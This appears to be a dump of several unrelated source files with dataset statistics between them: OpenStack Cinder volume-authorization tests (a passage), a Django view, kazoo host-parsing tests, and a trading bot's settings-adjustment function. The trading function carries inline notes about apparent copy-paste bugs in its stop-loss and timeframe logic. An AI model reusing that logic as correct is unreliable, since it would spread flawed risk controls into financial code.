'project_id': user_context.project_id
}
body = {"volume": {"size": 1, "image_id": fake_constants.IMAGE_ID}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get_volume')
def test_admin_can_show_volumes(self, mock_volume):
# Make sure administrators are authorized to list volumes
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
self.assertEqual(response.json_body['volume']['id'], volume.id)
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_can_show_volumes(self, mock_volume):
# Make sure owners are authorized to list their volumes
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
self.assertEqual(response.json_body['volume']['id'], volume.id)
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_cannot_show_volumes_for_others(self, mock_volume):
# Make sure volumes are only exposed to their owners
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
# NOTE(lbragstad): Technically, this user isn't supposed to see this
# volume, because they didn't create it and it lives in a different
# project. Does cinder return a 404 in cases like this? Or is a 403
# expected?
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_admin_can_get_all_volumes_detail(self):
# Make sure administrators are authorized to list volumes
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': admin_context.project_id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
self.assertEqual(volume.id, res_vol['id'])
def test_owner_can_get_all_volumes_detail(self):
# Make sure owners are authorized to list volumes
user_context = self.user_context
volume = self._create_fake_volume(user_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': user_context.project_id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
self.assertEqual(volume.id, res_vol['id'])
@mock.patch.object(volume_api.API, 'get')
def test_admin_can_update_volumes(self, mock_volume):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_can_update_volumes(self, mock_volume):
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_volumes_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_can_delete_volumes(self, mock_volume):
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_admin_can_delete_volumes(self, mock_volume):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_volumes_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get_volume')
def test_admin_can_show_tenant_id_in_volume(self, mock_volume):
# Make sure administrators are authorized to show tenant_id
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volume']
self.assertEqual(admin_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_can_show_tenant_id_in_volume(self, mock_volume):
# Make sure owners are authorized to show tenant_id in volume
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volume']
self.assertEqual(user_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_admin_can_show_tenant_id_in_volume_detail(self):
# Make sure admins are authorized to show tenant_id in volume detail
admin_context = self.admin_context
self._create_fake_volume(admin_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': admin_context.project_id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
# Make sure owners are authorized to show tenant_id
self.assertEqual(admin_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_owner_can_show_tenant_id_in_volume_detail(self):
# Make sure owners are authorized to show tenant_id in volume detail
user_context = self.user_context
self._create_fake_volume(user_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': user_context.project_id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
# Make sure owners are authorized to show tenant_id
self.assertEqual(user_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_admin_can_create_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_admin_can_get_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_admin_can_update_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_admin_can_delete_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_create_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_get_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_owner_can_update_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_owner_can_delete_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_create_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(non_owner_context, path, 'POST',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_get_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': non_owner_context.project_id,
'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
| 41.686992
| 78
| 0.650366
| 2,577
| 20,510
| 4.838184
| 0.069849
| 0.070019
| 0.038499
| 0.037295
| 0.918431
| 0.909849
| 0.899984
| 0.896134
| 0.885306
| 0.872393
| 0
| 0.003847
| 0.239542
| 20,510
| 491
| 79
| 41.771894
| 0.795538
| 0.074451
| 0
| 0.782235
| 0
| 0
| 0.129044
| 0.07389
| 0
| 0
| 0
| 0.002037
| 0.13467
| 1
| 0.088825
| false
| 0
| 0.014327
| 0
| 0.106017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aaddf688c3f1011c2bf5fdafe2edce62af3c351
| 149
|
py
|
Python
|
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | 1
|
2020-06-24T13:23:30.000Z
|
2020-06-24T13:23:30.000Z
|
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | null | null | null |
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def listar_tarefas(request):
    """Render the task-list page of the tasks app."""
    template_name = 'tarefas/listar_tarefas.html'
    return render(request, template_name)
| 29.8
| 57
| 0.791946
| 20
| 149
| 5.8
| 0.75
| 0.224138
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120805
| 149
| 5
| 57
| 29.8
| 0.885496
| 0.154362
| 0
| 0
| 0
| 0
| 0.216
| 0.216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
0ad83cf50e428b39181bd5ffedea399d85a31c55
| 1,946
|
py
|
Python
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
from unittest import TestCase
from kazoo.hosts import collect_hosts
class HostsTestCase(TestCase):
    """Tests for ``kazoo.hosts.collect_hosts``.

    ``collect_hosts`` accepts either a comma-separated connection string
    or a list of host strings and returns ``(hosts, chroot)``, where
    ``hosts`` is a list of ``(address, port)`` tuples.
    """

    def test_ipv4(self):
        # String form: comma-separated; surrounding whitespace (including
        # the in-literal line continuation) is tolerated by the parser.
        hosts, chroot = collect_hosts('127.0.0.1:2181, 192.168.1.2:2181, \
                                      132.254.111.10:2181')
        assert hosts == [('127.0.0.1', 2181),
                         ('192.168.1.2', 2181),
                         ('132.254.111.10', 2181)]
        assert chroot is None

        # List form must parse to the same result.
        hosts, chroot = collect_hosts(['127.0.0.1:2181',
                                       '192.168.1.2:2181',
                                       '132.254.111.10:2181'])
        assert hosts == [('127.0.0.1', 2181),
                         ('192.168.1.2', 2181),
                         ('132.254.111.10', 2181)]
        assert chroot is None

    def test_ipv6(self):
        # Bracketed IPv6 literals: brackets are stripped in the result.
        hosts, chroot = collect_hosts('[fe80::200:5aee:feaa:20a2]:2181')
        assert hosts == [('fe80::200:5aee:feaa:20a2', 2181)]
        assert chroot is None

        hosts, chroot = collect_hosts(['[fe80::200:5aee:feaa:20a2]:2181'])
        assert hosts == [('fe80::200:5aee:feaa:20a2', 2181)]
        assert chroot is None

    def test_hosts_list(self):
        # Hostnames, both string and list form.
        hosts, chroot = collect_hosts('zk01:2181, zk02:2181, zk03:2181')
        expected1 = [('zk01', 2181), ('zk02', 2181), ('zk03', 2181)]
        assert hosts == expected1
        assert chroot is None

        hosts, chroot = collect_hosts(['zk01:2181', 'zk02:2181', 'zk03:2181'])
        assert hosts == expected1
        assert chroot is None

        expected2 = '/test'
        # A chroot path may be appended inline to the last host ...
        hosts, chroot = collect_hosts('zk01:2181, zk02:2181, zk03:2181/test')
        assert hosts == expected1
        assert chroot == expected2

        # ... or supplied as a separate list element.
        hosts, chroot = collect_hosts(['zk01:2181',
                                       'zk02:2181',
                                       'zk03:2181', '/test'])
        assert hosts == expected1
        assert chroot == expected2
| 36.037037
| 78
| 0.511305
| 227
| 1,946
| 4.325991
| 0.176211
| 0.101833
| 0.14664
| 0.187373
| 0.867617
| 0.855397
| 0.855397
| 0.841141
| 0.841141
| 0.841141
| 0
| 0.23622
| 0.347379
| 1,946
| 53
| 79
| 36.716981
| 0.537008
| 0
| 0
| 0.487805
| 0
| 0.02439
| 0.190134
| 0.056526
| 0
| 0
| 0
| 0
| 0.390244
| 1
| 0.073171
| false
| 0
| 0.04878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4cea4e7559479623c337d018dd5c6cf38e7c74
| 9,347
|
py
|
Python
|
bot/dynamics.py
|
carden-code/Binance-Trading-Bot
|
25756cfc1ec07b777e32ea8c2d08d2a460cba08a
|
[
"MIT"
] | 17
|
2021-07-15T19:57:33.000Z
|
2022-01-19T13:32:44.000Z
|
bot/dynamics.py
|
amin-IT/Binance-volatility-trading-bot
|
5648f393abb93ec1b9899205787f1881cbf6e37e
|
[
"MIT"
] | null | null | null |
bot/dynamics.py
|
amin-IT/Binance-volatility-trading-bot
|
5648f393abb93ec1b9899205787f1881cbf6e37e
|
[
"MIT"
] | 5
|
2021-07-30T07:09:37.000Z
|
2021-11-04T14:14:04.000Z
|
import os
# use if needed to pass args to external modules
import sys
# used for directory handling
import glob
import time
import threading
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_telegram_creds
)
from bot.settings import *
def dynamic_settings(type, TIME_DIFFERENCE, RECHECK_INTERVAL):
    """Adjust the module-level trading settings in place.

    Mutates the global ``settings_struct`` / ``session_struct`` /
    ``trading_struct`` dicts: clamps the dynamic settings to
    ``DYNAMIC_MIN_MAX`` bounds, picks an adjustment direction from the
    last trade outcome, and applies a percentage up/down scaling or the
    market-resistance/support ('mrs_settings') recalculation.

    NOTE(review): the parameter name ``type`` shadows the builtin, the
    ``TIME_DIFFERENCE`` argument is immediately overwritten from config
    below, and ``RECHECK_INTERVAL`` is never used here — confirm intent
    before cleaning up.
    """
    global session_struct, settings_struct, trading_struct
    # Baseline values are re-read from the parsed config every call.
    STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
    TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
    TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
    DYNAMIC_MIN_MAX = parsed_config['trading_options']['DYNAMIC_MIN_MAX']
    HOLDING_PRICE_THRESHOLD = parsed_config['trading_options']['HOLDING_PRICE_THRESHOLD']

    if DYNAMIC_SETTINGS:
        #limiting STOP_LOSS TIME_DIFFERENCE and TRAILING_STOP_LOSS to dynamic min and max values
        # Clamp each dynamic setting to [base / DYNAMIC_MIN_MAX,
        # base * DYNAMIC_MIN_MAX].
        if settings_struct['STOP_LOSS'] < STOP_LOSS / DYNAMIC_MIN_MAX:
            settings_struct['STOP_LOSS'] = STOP_LOSS / DYNAMIC_MIN_MAX
        if settings_struct['TIME_DIFFERENCE'] < TIME_DIFFERENCE / DYNAMIC_MIN_MAX:
            settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE / DYNAMIC_MIN_MAX
        # NOTE(review): the bounds for TRAILING_STOP_LOSS (here and below)
        # are computed from STOP_LOSS, not TRAILING_STOP_LOSS — looks like
        # a copy/paste; confirm intended behavior.
        if settings_struct['TRAILING_STOP_LOSS'] < STOP_LOSS / DYNAMIC_MIN_MAX:
            settings_struct['TRAILING_STOP_LOSS'] = TRAILING_STOP_LOSS /DYNAMIC_MIN_MAX
        if settings_struct['STOP_LOSS'] > STOP_LOSS * DYNAMIC_MIN_MAX:
            settings_struct['STOP_LOSS'] = STOP_LOSS * DYNAMIC_MIN_MAX
        if settings_struct['TIME_DIFFERENCE'] > TIME_DIFFERENCE * DYNAMIC_MIN_MAX:
            settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE * DYNAMIC_MIN_MAX
        if settings_struct['TRAILING_STOP_LOSS'] > STOP_LOSS * DYNAMIC_MIN_MAX:
            settings_struct['TRAILING_STOP_LOSS'] = TRAILING_STOP_LOSS * DYNAMIC_MIN_MAX
        if settings_struct['HOLDING_PRICE_THRESHOLD'] < HOLDING_PRICE_THRESHOLD:
            settings_struct['HOLDING_PRICE_THRESHOLD'] = HOLDING_PRICE_THRESHOLD

        # Direction selection: a win continues the current direction,
        # a loss reverses it.
        if session_struct['last_trade_won'] == True and session_struct['dynamics_state'] == 'up':
            type = 'performance_adjust_up'
        if session_struct['last_trade_won'] == True and session_struct['dynamics_state'] == 'down':
            type = 'performance_adjust_down'
        if session_struct['last_trade_won'] == False and session_struct['dynamics_state'] == 'up':
            type = 'performance_adjust_down'
        if session_struct['last_trade_won'] == False and session_struct['dynamics_state'] == 'down':
            type = 'performance_adjust_up'

        # After 2+ consecutive losses, jump the timeframe to the opposite
        # side of the configured baseline and reset the loss counter.
        if trading_struct['consecutive_loss'] > 1:
            if settings_struct['TIME_DIFFERENCE'] > TIME_DIFFERENCE:
                settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE - (settings_struct['TIME_DIFFERENCE'] / TIME_DIFFERENCE * TIME_DIFFERENCE/DYNAMIC_MIN_MAX)
                print(f"TIMEFRAME JUMP TRIGGERED! TIME_DIFFERENCE: {settings_struct['TIME_DIFFERENCE']}")
            if settings_struct['TIME_DIFFERENCE'] < TIME_DIFFERENCE:
                settings_struct['TIME_DIFFERENCE'] = (TIME_DIFFERENCE * DYNAMIC_MIN_MAX) - (settings_struct['TIME_DIFFERENCE']/TIME_DIFFERENCE * TIME_DIFFERENCE * DYNAMIC_MIN_MAX)
                print(f"TIMEFRAME JUMP TRIGGERED! TIME_DIFFERENCE: {settings_struct['TIME_DIFFERENCE']}")
            trading_struct['consecutive_loss'] = 0

        #print(f'{txcolors.NOTICE}>> TRADE_WON: {session_struct['last_trade_won']} and DYNAMICS_STATE: {session_struct['dynamics_state']} <<<{txcolors.DEFAULT}')
        # Scale each setting up by DYNAMIC_WIN_LOSS_UP percent.
        if type == 'performance_adjust_up':
            settings_struct['STOP_LOSS'] = settings_struct['STOP_LOSS'] + (settings_struct['STOP_LOSS'] * DYNAMIC_WIN_LOSS_UP) / 100
            settings_struct['TAKE_PROFIT'] = settings_struct['TAKE_PROFIT'] + (settings_struct['TAKE_PROFIT'] * DYNAMIC_WIN_LOSS_UP) / 100
            settings_struct['TRAILING_STOP_LOSS'] = settings_struct['TRAILING_STOP_LOSS'] + (settings_struct['TRAILING_STOP_LOSS'] * DYNAMIC_WIN_LOSS_UP) / 100
            settings_struct['CHANGE_IN_PRICE_MAX'] = settings_struct['CHANGE_IN_PRICE_MAX'] - (settings_struct['CHANGE_IN_PRICE_MAX'] * DYNAMIC_WIN_LOSS_UP) /100
            settings_struct['CHANGE_IN_PRICE_MIN'] = settings_struct['CHANGE_IN_PRICE_MIN'] + (settings_struct['CHANGE_IN_PRICE_MIN'] * DYNAMIC_WIN_LOSS_UP) /100
            settings_struct['TIME_DIFFERENCE'] = settings_struct['TIME_DIFFERENCE'] + (settings_struct['TIME_DIFFERENCE'] * DYNAMIC_WIN_LOSS_UP) /100
            settings_struct['DYNAMIC_CHANGE_IN_PRICE'] = settings_struct['DYNAMIC_CHANGE_IN_PRICE'] - (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * DYNAMIC_WIN_LOSS_UP) / 100 \
                                                         - (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * settings_struct['TIME_DIFFERENCE']) / 100
            settings_struct['HOLDING_PRICE_THRESHOLD'] = settings_struct['HOLDING_PRICE_THRESHOLD'] + (settings_struct['HOLDING_PRICE_THRESHOLD'] * DYNAMIC_WIN_LOSS_UP) / 100
            session_struct['dynamic'] = 'none'
            session_struct['dynamics_state'] = 'up'
            session_struct['last_trade_won'] = 'none'
            print(f"{txcolors.NOTICE}>> DYNAMICS_UP Changing STOP_LOSS: {settings_struct['STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} - TAKE_PROFIT: {settings_struct['TAKE_PROFIT']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} - TRAILING_STOP_LOSS: {settings_struct['TRAILING_STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} CIP:{settings_struct['CHANGE_IN_PRICE_MIN']:.4f}/{settings_struct['CHANGE_IN_PRICE_MAX']:.4f}/{DYNAMIC_WIN_LOSS_UP:.2f} HTL: {settings_struct['HOLDING_TIME_LIMIT']:.2f} TD: {settings_struct['TIME_DIFFERENCE']} RI: {settings_struct['RECHECK_INTERVAL']} <<{txcolors.DEFAULT}")

        # Scale each setting down by DYNAMIC_WIN_LOSS_DOWN percent.
        if type == 'performance_adjust_down':
            settings_struct['STOP_LOSS'] = settings_struct['STOP_LOSS'] - (settings_struct['STOP_LOSS'] * DYNAMIC_WIN_LOSS_DOWN) / 100
            settings_struct['TAKE_PROFIT'] = settings_struct['TAKE_PROFIT'] - (settings_struct['TAKE_PROFIT'] * DYNAMIC_WIN_LOSS_DOWN) / 100
            settings_struct['TRAILING_STOP_LOSS'] = settings_struct['TRAILING_STOP_LOSS'] - (settings_struct['TRAILING_STOP_LOSS'] * DYNAMIC_WIN_LOSS_DOWN) / 100
            settings_struct['CHANGE_IN_PRICE_MAX'] = settings_struct['CHANGE_IN_PRICE_MAX'] + (settings_struct['CHANGE_IN_PRICE_MAX'] * DYNAMIC_WIN_LOSS_DOWN) /100
            settings_struct['CHANGE_IN_PRICE_MIN'] = settings_struct['CHANGE_IN_PRICE_MIN'] - (settings_struct['CHANGE_IN_PRICE_MIN'] * DYNAMIC_WIN_LOSS_DOWN) /100
            # NOTE(review): this line scales TIME_DIFFERENCE with
            # DYNAMIC_WIN_LOSS_UP in the *down* branch — confirm whether
            # DYNAMIC_WIN_LOSS_DOWN was intended.
            settings_struct['TIME_DIFFERENCE'] = settings_struct['TIME_DIFFERENCE'] - (settings_struct['TIME_DIFFERENCE'] * DYNAMIC_WIN_LOSS_UP) /100
            settings_struct['DYNAMIC_CHANGE_IN_PRICE'] = settings_struct['DYNAMIC_CHANGE_IN_PRICE'] + (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * DYNAMIC_WIN_LOSS_DOWN) / 100 \
                                                         + (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * settings_struct['TIME_DIFFERENCE']) / 100
            settings_struct['HOLDING_PRICE_THRESHOLD'] = settings_struct['HOLDING_PRICE_THRESHOLD'] - (settings_struct['HOLDING_PRICE_THRESHOLD'] * DYNAMIC_WIN_LOSS_DOWN) / 100
            session_struct['dynamic'] = 'none'
            session_struct['dynamics_state'] = 'down'
            session_struct['last_trade_won'] = 'none'
